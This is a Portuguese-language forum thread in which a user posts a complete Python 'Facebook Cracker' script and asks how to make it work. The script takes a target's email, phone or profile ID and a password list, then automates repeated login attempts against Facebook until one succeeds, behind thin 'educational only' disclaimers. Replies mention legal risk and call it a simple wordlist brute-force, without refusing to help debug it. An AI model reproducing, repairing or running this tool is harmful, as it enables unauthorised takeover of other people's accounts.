antiblock
Rodnia | Alpha & Omega
  • Chatbox

    Did you check out our Discord? https://discord.gg/FFdvMjk9xA
    You don't have permission to chat.
    Load More
f_society

Facebook.py

3 posts in this topic

Boas :) Que posso mudar para que funcione?

2s6lfgi.png

#!usr/bin/python

#Facebook Cracker Version 2.1 can crack into Facebook Database 100% without Interruption By Facebook Firewall !

#This program is for educational purposes only.

#Don't attack people facebook accounts it's illegal !

#If you want to crack into someone's account, you must have the permission of the user.

#Mauritania Attacker is not responsible.

import sys

import random

import mechanize

import cookielib

import pdb

GHT = '''

+=======================================+

|..............F Society................|

+---------------------------------------+

|#Author: F Society |

|#Contact: F Society |

|#Contributos: BasicExpert |

|#contributor contact: |

| |

| |

|#Date: 2016 |

|#Update at: 2016 |

|#This tool is made for pentesting. |

|#Changing the Description of this tool |

|Won't made you the coder ^_^ !!! |

|#Respect Coderz ^_^ |

|#I take no responsibilities for the |

| use of this program ! |

+=======================================+

|..........Facebook Cracker v 2.1.......|

+---------------------------------------+

'''

print "Note: - This tool can crack facebook account even if you don't have the email of your victim"

print "# Hit CTRL+C to quit the program"

print "# Use www.graph.facebook.com for more infos about your victim ^_^"

email = str(raw_input("# Enter |Email| |Phone number| |Profile ID number| |Username| : "))

passwordlist = str(raw_input("Enter the name of the password list file : "))

useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]

login = 'https://www.facebook.com/login.php?login_attempt=1'

def attack(password):

try:

sys.stdout.write("\r[*] trying %s.. " % password)

sys.stdout.flush()

br.addheaders = [('User-agent', random.choice(useragents))]

site = br.open(login)

br.select_form(nr=0)

##Facebook

br.form['email'] =email

br.form['pass'] = password

br.submit()

log = br.geturl()

if (log != login) and (not 'login_attempt' in log):

pdb.set_trace()

print "\n\n\n [*] Password found .. !!"

print "\n [*] Password : %s\n" % (password)

sys.exit(1)

except KeyboardInterrupt:

print "\n[*] Exiting program .. "

sys.exit(1)

def search():

global password

for password in passwords:

attack(password.replace("\n",""))

def check():

global br

global passwords

try:

br = mechanize.Browser()

cj = cookielib.LWPCookieJar()

br.set_handle_robots(False)

br.set_handle_equiv(True)

br.set_handle_referer(True)

br.set_handle_redirect(True)

br.set_cookiejar(cj)

br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

except KeyboardInterrupt:

print "\n[*] Exiting program ..\n"

sys.exit(1)

try:

list = open(passwordlist, "r")

passwords = list.readlines()

k = 0

while k < len(passwords):

passwords[k] = passwords[k].strip()

k += 1

except IOError:

print "\n [*] Error: check your password list path \n"

sys.exit(1)

except KeyboardInterrupt:

print "\n [*] Exiting program ..\n"

sys.exit(1)

try:

print GHT

print " [*] Account to crack : %s" % (email)

print " [*] Loaded :" , len(passwords), "passwords"

print " [*] Cracking, please wait ..."

except KeyboardInterrupt:

print "\n [*] Exiting program ..\n"

sys.exit(1)

try:

search()

attack(password)

except KeyboardInterrupt:

print "\n [*] Exiting program ..\n"

sys.exit(1)

if __name__ == '__main__':

check()

Share this post


Link to post
Share on other sites
antiblock
Elveron

Boas :) Que posso mudar para que funcione?

2s6lfgi.png

#Don't attack people facebook accounts it's illegal !

#If you want to crack into someone's account, you must have the permission of the user.

|..............F Society................|

+---------------------------------------+

|#Author: F Society |

|#Contact: F Society |

|#Changing the Description of this tool |

|Won't made you the coder ^_^ !!! |

|#Respect Coderz ^_^ |

Primeiro vais voltar a por os créditos originais porque não tens o direito de desrespeitar o autor.

Segundo, tem em atenção que caso usufruas dessa tool de forma ilícita e caso a vitima retenha o que acabaste de partilhar, vais preso entre 2 a 5 anos.

Share this post


Link to post
Share on other sites

A única coisa que esse script faz é um bruteforce com base numa wordlist, nada de novo.

Pelo que me parece ele não consegue agarrar no argumento de email que envias-te, possivelmente a sintaxe que envias-te não é a correcta.

Se queres ser um "Hacker" a sério deixa de pegar em scripts já feitos, faz uns por ti próprio porque o que esse script faz não é nada de especial e aí sim já mereces o mérito.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now